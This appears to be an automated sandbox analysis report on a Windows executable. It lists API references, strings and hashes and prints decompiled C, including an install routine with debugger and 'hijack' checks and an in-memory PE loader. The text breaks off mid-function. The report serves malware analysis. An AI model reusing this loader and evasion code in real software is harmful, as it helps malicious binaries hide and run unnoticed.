Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: NameUser
String ID: Software\Google\Google Pinyin 2 Preferences
API String ID: 2645101109-1894986876
Opcode ID: 2ca8387c82bb850c8673a80d341fb09008f5b36714112cf42596d999d33a5daa
Instruction ID: 4ff3ff23b391d7cee0f76d8077cc8428a71a24855b6fab8f23687bac4c4f15c3
Opcode Fuzzy Hash: 2ca8387c82bb850c8673a80d341fb09008f5b36714112cf42596d999d33a5daa
Instruction Fuzzy Hash: 0F218EB12087409FD310DF2AD846B5BB7E8EB88714F440A2EF546D7281D679E9088B96

Uniqueness

Uniqueness Score: -1.00%

Function 004055C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004055D5

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

_memmove.LIBCMT ref: 00405622

Strings

string too long, xrefs: 004055D0

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: b6dc6b92eb218587e2b9a5e564de6799896eab2f0cdd9d361615620669a26d0e
Instruction ID: f844fde59c64e64c5941d788e34788afa7691e75954682acdb388921ae2eece2
Opcode Fuzzy Hash: b6dc6b92eb218587e2b9a5e564de6799896eab2f0cdd9d361615620669a26d0e
Instruction Fuzzy Hash: 0A110A72144B185BD624EE65ED4083BB3D9EF61710B540E3FE48BD35C0E775A4484A98

Uniqueness

Uniqueness Score: -1.00%

Function 004262D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00426307

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

Part of subcall function 00404190: __invoke_watson.LIBCMT ref: 004041B2

_memmove.LIBCMT ref: 00426336

Strings

vector<T> too long, xrefs: 00426302

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument__invoke_watson_memmovestd::_
String ID: vector<T> too long
API String ID: 2292635916-3788999226
Opcode ID: 951dfbfd839b5651845cef73e90c19be2d94af0f7ea804662a015a7cbbc72939
Instruction ID: 7aef2d3763e66f428d73463d619bf81a0b1668bb9f56d32c1f45f3fe57573d6f
Opcode Fuzzy Hash: 951dfbfd839b5651845cef73e90c19be2d94af0f7ea804662a015a7cbbc72939
Instruction Fuzzy Hash: 4F21C3B16007059FC310EF6AD98192BFBE8FB44710F504A3FE96593741E739E8098B65

Uniqueness

Uniqueness Score: -1.00%

Function 004111B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

_memmove_s.LIBCMT ref: 0041121A

Strings

Google\Google Pinyin 2, xrefs: 004111B0

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove_s
String ID: Google\Google Pinyin 2
API String ID: 800865076-2359458438
Opcode ID: be4906a0281f7e225cb97f551f61094c0261d3576cd46bc0c6d6a5a319faf8f5
Instruction ID: dec173d2a12faacacce37a004186883d5d918fa28c04913233f1262f065187bb
Opcode Fuzzy Hash: be4906a0281f7e225cb97f551f61094c0261d3576cd46bc0c6d6a5a319faf8f5
Instruction Fuzzy Hash: BE11C1717016049FC714EFAAE89896FF3E5EF94314711856EF2419B264DE38A9808668

Uniqueness

Uniqueness Score: -1.00%

Function 004616B0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004616C2

Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3A3
Part of subcall function 004EE38E: __CxxThrowException@8.LIBCMT ref: 004EE3B8
Part of subcall function 004EE38E: std::exception::exception.LIBCMT ref: 004EE3C9

std::_Xinvalid_argument.LIBCPMT ref: 004616D8

Strings

string too long, xrefs: 004616BD, 004616D3

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 6937a24a24110c3e372bc645dbda4313813b4824542dfcb91ad9c8444a4baded
Instruction ID: 4d6b3714aa9dbe11946fce441fe36c1fd51fa5fb4323c93a3d027bb2c4738be7
Opcode Fuzzy Hash: 6937a24a24110c3e372bc645dbda4313813b4824542dfcb91ad9c8444a4baded
Instruction Fuzzy Hash: 0911E5757002009B8708EF7AE8D182AB366FF99316718423FF501D73B0EB35A860876E

Uniqueness

Uniqueness Score: -1.00%

Function 00404550, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FD60: RegOpenCurrentUser.ADVAPI32(0002011F,?), ref: 0040FDE7
Part of subcall function 0040FD60: RegCloseKey.ADVAPI32(?,00000000,0002011F), ref: 0040FE1A

RegQueryValueExW.ADVAPI32(?,FirstLaunch,00000000,?,?,?), ref: 004045B4
RegSetValueExW.ADVAPI32(?,FirstLaunch,00000000,00000004,?,00000004), ref: 004045F0

Strings

FirstLaunch, xrefs: 004045A6, 004045EA

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$CloseCurrentOpenQueryUser
String ID: FirstLaunch
API String ID: 1750291255-1409038210
Opcode ID: 4ba0b0717436456169b3c7c8f6e7fbacfe8bd4bdc5f2ad6520306893e5733a77
Instruction ID: fbeb948e96764a26ae0154be9bfbe900985f902e83bdc6c837170d1d293a2e64
Opcode Fuzzy Hash: 4ba0b0717436456169b3c7c8f6e7fbacfe8bd4bdc5f2ad6520306893e5733a77
Instruction Fuzzy Hash: A51190B1508701AFD320DF54C845B5BB7E8FF99B18F000A2EF695A62D0D7789548CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405540, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040554F

Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE3F0
Part of subcall function 004EE3DB: __CxxThrowException@8.LIBCMT ref: 004EE405
Part of subcall function 004EE3DB: std::exception::exception.LIBCMT ref: 004EE416

_memmove.LIBCMT ref: 0040558A

Strings

invalid string position, xrefs: 0040554A

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: d555aa11f14f8788d9e9b81b820000d77fab80cef2952b1b2178adce0f394228
Instruction ID: f753a02a01307e6fc937d040477a9795d4eece5e9fcb08f771bde4ba00bb16c2
Opcode Fuzzy Hash: d555aa11f14f8788d9e9b81b820000d77fab80cef2952b1b2178adce0f394228
Instruction Fuzzy Hash: F1015E31300A119BC724CE3DED9081BB3B7EFC57453244A3ED096DBA9DEA35D9468B98

Uniqueness

Uniqueness Score: -1.00%

Function 00493580, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00493599
_memmove.LIBCMT ref: 004935D0

Strings

u7I, xrefs: 00493582, 00493597, 004935CE

Memory Dump Source

Source File: 00000000.00000002.259489856.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259327477.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263030676.00000000004F0000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.263045725.00000000004F2000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.263130751.0000000000521000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.263274480.0000000000559000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.263305880.000000000055A000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.263329525.0000000000562000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove
String ID: u7I
API String ID: 4104443479-846998185
Opcode ID: 02f3b72caf426a42ae980796731125480b5ab9138ecd5774aa3b30dc9fb56b7e
Instruction ID: 6a12f5d5a54e75a319555f406eae8202c06081ca5516ab3022aa5f63619cc547
Opcode Fuzzy Hash: 02f3b72caf426a42ae980796731125480b5ab9138ecd5774aa3b30dc9fb56b7e
Instruction Fuzzy Hash: 66018BB26007069FC720DF6AC880A17F7E8EB88718F10882EE29583600D376F954CB60

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 6272167835D47591.exe PID: 6612 Parent PID: 6476 6272167835D47591.exeCOMMON

Executed Functions

Function 100204C0, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E100204C0(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E10022D01);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FD60();
				_v312 = 0;
				E1000CF20(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A600(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A0F0("Global\\exist_sign__install_r3");
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF20(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CD96( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0);
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A170( &_v312);
							_t102 = _t56;
							_t57 = E1001A170( &_v576);
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FDB0();
						E1001FF90(_t82, _t100, _t102, __eflags, "install", "user01", "-0.25", "45.0.0", "exe");
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E10020180(_t82, _t100, _t102, __eflags);
						_t115 = _t114 + 0x1c;
						__eflags = PathFileExistsA("C:\\hijack");
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E10020180(_t82, _t100, _t102, __eflags);
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "user01");
							E1001FEA0(_t82, _t100, _t102, __eflags);
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "user01");
							E1001FDC0(_t82, _t100, _t102, __eflags);
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E10020180(_t82, _t100, _t102, __eflags);
						} else {
							E1001A0A0();
							_t75 = E1001A0B0(_t89);
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D10();
								if(__eflags == 0) {
									_t77 = E1001FA30(_t82, _t100, _t102, __eflags, 0x3e8, 0);
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A260();
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020A80(__ebx, _t100, _t101, _t126, "45.0.0"); // executed
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}

0x100204c0
0x100204c0
0x100204c0
0x100204c3
0x100204c5
0x100204d0
0x100204d1
0x100204de
0x100204df
0x100204e4
0x100204f9
0x1002050f
0x10020519
0x10020521
0x10020538
0x1002053d
0x10020540
0x10020542
0x1002057f
0x10020584
0x10020587
0x10020589
0x10020590
0x100205a5
0x100205b9
0x100205d4
0x100205d9
0x100205ec
0x100205f8
0x100205fe
0x10020605
0x1002060d
0x10020616
0x1002061b
0x1002061e
0x10020620
0x00000000
0x00000000
0x10020627
0x10020639
0x1002063e
0x00000000
0x00000000
0x10020640
0x00000000
0x1002063e
0x10020644
0x10020662
0x1002066a
0x1002066d
0x1002066f
0x1002067f
0x10020685
0x1002068a
0x10020698
0x1002069a
0x100206d0
0x100206d0
0x100206d5
0x100206e5
0x100206eb
0x100206f3
0x100206f8
0x10020708
0x1002070e
0x10020716
0x1002071b
0x1002072b
0x10020731
0x1002073e
0x1002074e
0x10020754
0x1002069c
0x1002069c
0x100206a1
0x100206a6
0x100206a8
0x100206b3
0x100206aa
0x100206af
0x100206b1
0x100206bf
0x100206c4
0x100206c7
0x100206c9
0x00000000
0x00000000
0x100206cb
0x00000000
0x00000000
0x00000000
0x100206b1
0x100206a8
0x00000000
0x1002058b
0x1002075c
0x10020761
0x1002076b
0x10020775
0x1002077a
0x10020544
0x10020549
0x10020551
0x1002055b
0x10020565
0x1002056a
0x1002056a
0x10020783
0x1002078e

APIs

_memset.LIBCMT ref: 100204F9
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002050F

Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5

Strings

status=main_start, xrefs: 10020675
C:\hijack, xrefs: 1002068D
45.0.0, xrefs: 1002064E
user01, xrefs: 10020658
-0.25, xrefs: 10020653
45.0.0, xrefs: 10020544
status=check_debug, xrefs: 100206DB
exe, xrefs: 10020649
user01, xrefs: 10020721
status=main_over, xrefs: 10020744
install, xrefs: 1002065D
user01, xrefs: 100206FE
Global\exist_sign__install_r3, xrefs: 1002057A

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: FileModuleName_memset$_sprintf
String ID: -0.25$45.0.0$45.0.0$C:\hijack$Global\exist_sign__install_r3$exe$install$status=check_debug$status=main_over$status=main_start$user01$user01$user01
API String ID: 3079340674-1842766907
Opcode ID: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
Instruction ID: 7a4b6182ef5b3e753845166e3f5bee58e7f320f9ef64b03b030670d1f597adbb
Opcode Fuzzy Hash: 223e698365b0860e5aae29af135c91e351df2f6d4b25efb7f7cfea949ec79a0c
Instruction Fuzzy Hash: 5351A1B5D04318ABEB20EBA4DC4BBDE7775DB50344F500194F90966182EB71BB84CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 10019780, Relevance: 6.1, APIs: 4, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E10019780(void* __ebx, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44) {
				char _v8;
				char _v12;
				void* _t45;

				_v8 = 0;
				_v12 = 0;
				__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12, 0, 0, _a44); // executed
				if(GetLastError() == 0x7a) {
					 *_a40 = L1000CE56(__ebx, _a44, _t45, __esi,  *_a44);
					E1000CF20(_t45,  *_a40, 0,  *_a44);
					__imp__SetupDiGetDeviceRegistryPropertyA(_a4,  &_a8, _a36,  &_v12,  *_a40,  *_a44, 0); // executed
					_v8 = 1;
				}
				return _v8;
			}

0x10019786
0x1001978d
0x100197ac
0x100197bb
0x100197ce
0x100197de
0x10019804
0x1001980a
0x1001980a
0x10019817

APIs

SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 100197AC
GetLastError.KERNEL32 ref: 100197B2
_memset.LIBCMT ref: 100197DE
SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019804

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: DevicePropertyRegistrySetup$ErrorLast_memset
String ID:
API String ID: 895502402-0
Opcode ID: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
Instruction ID: f8922b701b9361cc18bff0ab125b4374f9cfd65e033693ba824ef8b8be46b605
Opcode Fuzzy Hash: 6adbbad0e525441aa34f394d1e709c810f69e4a50dd3602c5c2cb0cc2a6a471c
Instruction Fuzzy Hash: 8C1193B9610208BBDB04DF98D895FDA77B9AB49304F108259F9099B284D631EA85CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001A170, Relevance: 3.0, APIs: 2, Instructions: 21
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A170(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}

0x1001a179
0x1001a18e
0x1001a194
0x1001a1a1
0x1001a1a9
0x1001a1a9
0x1001a1b6
0x1001a1c5

APIs

FindFirstFileA.KERNEL32(1001A679,?), ref: 1001A18E
FindClose.KERNEL32(000000FF), ref: 1001A1B6

Memory Dump Source

Source File: 00000002.00000002.356009315.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.355968355.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.356255402.0000000010023000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358191714.0000000010332000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.358214423.0000000010337000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.358225603.0000000010338000.00000004.00000001.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
Instruction ID: 097559f34e7186eb2c7e5fd791b7ca3a953ceb1394cb31efbd5b4482c630521c
Opcode Fuzzy Hash: 0d0f7e1b90d12563d86b766f37a796064df2748116d1dddbb477bfb1d1da362b
Instruction Fuzzy Hash: 66F0C974D0022C9BDB70DF64DD88BDDB7B8AB48310F1042D4E91DA32A0DA30AED58F50

Uniqueness

Uniqueness Score: -1.00%

Function 1001B620, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 350
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001B620(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AE40(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AE40(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AE80( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AE80(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AE40(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D190(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B300(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B0C0(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001AB60(_v76); // executed
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B490(_v76); // executed
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001AD80(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
